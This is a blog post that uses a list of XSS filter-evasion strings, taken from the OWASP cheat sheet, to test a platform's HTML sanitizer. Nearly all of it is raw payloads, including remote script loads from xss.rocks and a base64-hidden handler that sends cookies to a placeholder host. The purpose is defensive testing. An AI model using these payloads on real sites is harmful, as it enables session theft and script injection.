Steem Platform Security Test / OWASP - XSS Filter Evasion Cheat Sheet

This post acts as a public XSS Security Test for my upcoming Post Editor on SteemWorld. Of course, it can also be used to test other platforms against many different XSS attacks. If you see a message stating 'XSS' while viewing this post, one of the test strings below was executed instead of being sanitized, so the Steem platform you are using may not be secure and the developers need to be contacted immediately.

Since I recently finished the Sanitizer Module of my HTML Parser for the Editor, it's now time to test different scripting attacks, and I think it is a good idea to have a post that makes it easy to re-test any future changes. A few things might still be added in the next few days.

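I've spent some time checking the official OWASP XSS Filter Evasion Cheat Sheet (last revision: 02/23/2019) and included the relevant attacks in this post. Many of these vectors only fire in specific (often older) browsers, so seeing no 'XSS' message in one browser does not by itself prove that a sanitizer is safe; inspecting the rendered HTML is the more reliable check.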

<SCRIPT SRC=http://xss.rocks/xss.js>

javascript:/*--><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>

javascript:/--><svg/onload='+/"/+/onmouseover=1/+/[/[]/+alert(1)//'>


javascript:/*--><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>

javascript:/--><svg/onload='+/"/+/onmouseover=1/+/[/[]/+alert(1)//'>


<IMG SRC="javascript:alert('XSS');">


<IMG SRC=javascript:alert('XSS')>

<IMG SRC=javascript:alert('XSS')>


<IMG SRC=JaVaScRiPt:alert('XSS')>

<IMG SRC=JaVaScRiPt:alert('XSS')>


<IMG SRC=javascript:alert(&quot;XSS&quot;)>


<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>

<IMG SRC=javascript:alert("RSnake says, 'XSS'")>


<IMG """>alert("XSS")">

<IMG """>alert("XSS")">


<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>


<IMG SRC=# onmouseover="alert('xxs')">


<IMG SRC= onmouseover="alert('xxs')">

<IMG SRC= onmouseover="alert('xxs')">


<IMG onmouseover="alert('xxs')">


<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))">img>

<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))">


<img src=x onerror="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041">


<IMG SRC=&#106;&#97;vascript:alert(
&#39;XSS')>

<IMG SRC=javascript:alert(
'XSS')>


<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&
#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&
#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>


<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>


<IMG SRC="jav   ascript:alert('XSS');">


<IMG SRC="jav	ascript:alert('XSS');">


<IMG SRC="jav
ascript:alert('XSS');">


<IMG SRC="jav
ascript:alert('XSS');">


<IMG SRC="   javascript:alert('XSS');">


<SCRIPT/XSS SRC="http://xss.rocks/xss.js"></SCRIPT>
<SCRIPT/XSS SRC="http://xss.rocks/xss.js">
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<SCRIPT/SRC="http://xss.rocks/xss.js"></SCRIPT>
<SCRIPT/SRC="http://xss.rocks/xss.js">
<<SCRIPT>alert("XSS");//<

<alert("XSS");//<


<SCRIPT SRC=http://xss.rocks/xss.js?< B >

<SCRIPT SRC=//xss.rocks/.j>

<IMG SRC="javascript:alert('XSS')"

<IMG SRC="javascript:alert('XSS')"


<iframe src=http://xss.rocks/scriptlet.html <

</TITLE>alert("XSS");</SCRIPT>

alert("XSS");


<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">


<BODY BACKGROUND="javascript:alert('XSS')">

<IMG DYNSRC="javascript:alert('XSS')">


<IMG LOWSRC="javascript:alert('XSS')">


<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE>
  • XSSbr>
    • XSS
      <IMG SRC='vbscript:msgbox("XSS")'>
      


      <IMG SRC="livescript:[code]">
      


      <svg/onload=alert('XSS')>
      

      <svg/onload=alert('XSS')>


      <BODY ONLOAD=alert('XSS')>
      
      <BODY ONLOAD=alert('XSS')>
      <BGSOUND SRC="javascript:alert('XSS');">
      


      <BR SIZE="&{alert('XSS')}">
      



      <LINK REL="stylesheet" HREF="javascript:alert('XSS');">
      


      <LINK REL="stylesheet" HREF="http://xss.rocks/xss.css">
      


      <STYLE>@import'http://xss.rocks/xss.css';</STYLE>
      

      <META HTTP-EQUIV="Link" Content="<http://xss.rocks/xss.css>; REL=stylesheet">
      


      <STYLE>BODY{-moz-binding:url("http://xss.rocks/xssmoz.xml#xss")}</STYLE>
      

      <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
      

      <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
      


      exp/*<A STYLE='no\xss:noxss("*//*");
      xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
      

      exp/*


      <STYLE TYPE="text/javascript">alert('XSS');</STYLE>
      

      <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE>A>
      
      
      
      <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
      

      <XSS STYLE="xss:expression(alert('XSS'))">
      


      <XSS STYLE="behavior: url(xss.htc);">
      


      ¼script¾alert(¢XSS¢)¼/script¾
      

      ¼script¾alert(¢XSS¢)¼/script¾


      <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
      


      <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
      


      <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
      


      <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
      

      <IFRAME SRC=# onmouseover="alert(document.cookie)">
      

      <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
      


      <TABLE BACKGROUND="javascript:alert('XSS')"></TABLE>
      

      <TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD>TABLE>
      
      

      <DIV STYLE="background-image: url(javascript:alert('XSS'))">
      

      <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"></DIV>
      

      <DIV STYLE="width: expression(alert('XSS'));"></DIV>
      

      
      

      <BASE HREF="javascript:alert('XSS');//">
      


      <OBJECT TYPE="text/x-scriptlet" DATA="http://xss.rocks/scriptlet.html"></OBJECT>
      

      <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
      

      <XML ID="xss"><I><B><IMG SRC="javascript:alert('XSS')"></B>I></XML>
      <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
      
      



      <SCRIPT a=">" SRC="httx://xss.rocks/xss.js"></SCRIPT>
      

      <img onload="eval(atob('ZG9jdW1lbnQubG9jYXRpb249Imh0dHA6Ly9saXN0ZXJuSVAvIitkb2N1bWVudC5jb29raWU='))">
      

      If you are a developer and need help protecting your app against such attacks, feel free to leave me a message ;)

      Just to be safe,


